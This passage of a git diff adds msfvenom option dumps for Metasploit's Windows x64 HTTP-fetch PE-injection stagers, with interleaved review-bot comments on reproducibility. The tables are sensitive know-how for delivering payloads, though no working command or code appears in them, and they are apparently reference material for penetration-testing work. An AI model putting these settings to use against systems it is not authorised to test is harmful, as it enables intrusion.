payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
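Review bot: the FETCH_FILENAME default in this hunk (`FETCH_FILENAME JJIfTrrFVG no Name to use on remote system when storing payload; cannot contain spaces or slashes`) is a per-run random string, so this snapshot cannot be regenerated without producing a spurious diff; the same applies to every payload_options file in this patch (each one carries a different random value). Suggest normalizing that field to a fixed placeholder before committing, or recording the exact msfvenom command and Metasploit version used to produce the files, since neither appears anywhere in the dump and option sets change between releases. Also, the second options table that follows the Description block opens with a bare `Name Current Setting Required Description` header with nothing to distinguish it from the "Basic options:" table above it; if the generator emits an advanced-options heading, keep it, otherwise add one so readers can tell the two tables apart.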
diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_ipv6_tcp.txt new file mode 100644 index 0000000..844a157 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_ipv6_tcp.txt 
@@ -0,0 +1,74 @@ + + Name: HTTP Fetch, Windows x64 IPv6 Bind TCP Stager + Module: payload/cmd/windows/http/x64/peinject/bind_ipv6_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + ege + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME WvYarZcUgcRA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +PE yes The local path to the PE file to upload +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for an IPv6 connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. 
+ EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
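Review bot: FETCH_SRVHOST is `Required yes` in this file but `Required no` in the meterpreter_reverse_tcp file above, with the identical description "Local IP to use for serving payload" in both. The difference is consistent with this bind stager having no LHOST line for the fetch server to fall back to (compare the LHOST entry in the reverse_tcp file), but nothing in the directory says so; a sentence in the payload_options README explaining why the bind variants require FETCH_SRVHOST would stop readers from reading it as a generation error.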
diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..30af1af --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_ipv6_tcp_uuid.txt 
@@ -0,0 +1,75 @@ + + Name: HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support + Module: payload/cmd/windows/http/x64/peinject/bind_ipv6_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 123 + Rank: Normal + +Provided by: + Brendan Watters + ege + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME wFtpHzNT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +PE yes The local path to the PE file to upload +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for an IPv6 connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. 
+ EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_named_pipe.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_named_pipe.txt new file mode 100644 index 0000000..b21739d --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_named_pipe.txt 
@@ -0,0 +1,80 @@ + + Name: HTTP Fetch, Windows x64 Bind Named Pipe Stager + Module: payload/cmd/windows/http/x64/peinject/bind_named_pipe + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + ege + UserExistsError + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME knEjtSYPro no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 445 yes SMB port +PE yes The local path to the PE file to upload +PIPENAME msf-pipe yes Name of the pipe to connect to +RHOST no Host of the pipe to connect to +SMBDomain . no The Windows domain to use for authentication +SMBPass no The password for the specified username +SMBUser no The username to authenticate as + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. 
+ Listen for a pipe connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + 
SMBDirect true yes The target port is a raw SMB service (not NetBIOS) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WAIT_TIMEOUT 10 no Seconds pipe will wait for a connection + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_tcp.txt new file mode 100644 index 0000000..8fa1206 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_tcp.txt 
@@ -0,0 +1,74 @@ + + Name: HTTP Fetch, Windows x64 Bind TCP Stager + Module: payload/cmd/windows/http/x64/peinject/bind_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + ege + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME UrRCIdxTX no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +PE yes The local path to the PE file to upload +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. 
+ EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_tcp_rc4.txt new file mode 100644 index 0000000..d1a6c2b --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_tcp_rc4.txt 
@@ -0,0 +1,80 @@ + + Name: HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/peinject/bind_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + ege + hdm + skape + sf + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME bPnyAVXBMa no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +PE yes The local path to the PE file to upload +RC4PASSWORD msf yes Password to derive RC4 key from +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder 
no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_tcp_uuid.txt new file mode 100644 index 0000000..0a3c04b --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-bind_tcp_uuid.txt 
@@ -0,0 +1,75 @@ + + Name: HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64) + Module: payload/cmd/windows/http/x64/peinject/bind_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + ege + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME rzacvWgTF no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +PE yes The local path to the PE file to upload +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. 
+ EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_named_pipe.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_named_pipe.txt new file mode 100644 index 0000000..2832096 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_named_pipe.txt 
@@ -0,0 +1,74 @@ + + Name: HTTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager + Module: payload/cmd/windows/http/x64/peinject/reverse_named_pipe + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + ege + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME zEkvLUTxxl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +PE yes The local path to the PE file to upload +PIPEHOST . yes Host of the pipe to connect to +PIPENAME msf-pipe yes Name of the pipe to listen on + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker via a named pipe pivot + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. 
+ EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_tcp.txt new file mode 100644 index 0000000..4389278 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_tcp.txt 
@@ -0,0 +1,81 @@ + + Name: HTTP Fetch, Windows x64 Reverse TCP Stager + Module: payload/cmd/windows/http/x64/peinject/reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 123 + Rank: Normal + +Provided by: + Brendan Watters + ege + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME EocOJspe no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +PE yes The local path to the PE file to upload + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to the attacker (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. 
+ EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_tcp_rc4.txt new file mode 100644 index 0000000..575a435 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-peinject-reverse_tcp_rc4.txt 
